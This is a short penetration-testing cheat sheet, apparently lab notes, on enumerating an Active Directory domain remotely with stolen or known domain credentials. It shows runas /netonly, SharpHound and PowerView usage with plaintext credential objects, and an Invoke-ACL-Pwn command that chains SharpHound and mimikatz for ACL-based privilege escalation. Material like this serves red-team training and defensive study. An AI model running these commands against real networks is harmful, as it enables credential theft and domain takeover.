Skip to content

Remote Enumeration

With Domain Creds

Run SharpHound remotely with creds

This can be used to run any binary or powershell script remotely e.g. invoke-mimikatz

# Switch to a world writable directory so we have permission to write files to disk
cd \windows\tasks

# the netonly command means creds are only used for network access
runas /netonly /user:lab.local\administrator cmd.exe

# verify we are using the correct creds using
net view \\WIN-8K30QDLT1AP.lab.local\

# run bloodhound remotely, pass -d argument to specify the domain name
C:\tools\SharpHound-v1.0.4\SharpHound.exe -d "lab.local"

Run PowerView remotely with creds

  1. Import powerview

    import-module .\powerview.ps1

  2. Setup the credentials object

    $passwd = ConvertTo-SecureString "[email protected]" -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential("lab.local\administrator", $passwd)

Run Invoke-ACL-Pwn Remotely with creds

# add the -WhatIf flag to view pathes before exploitation
.\Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'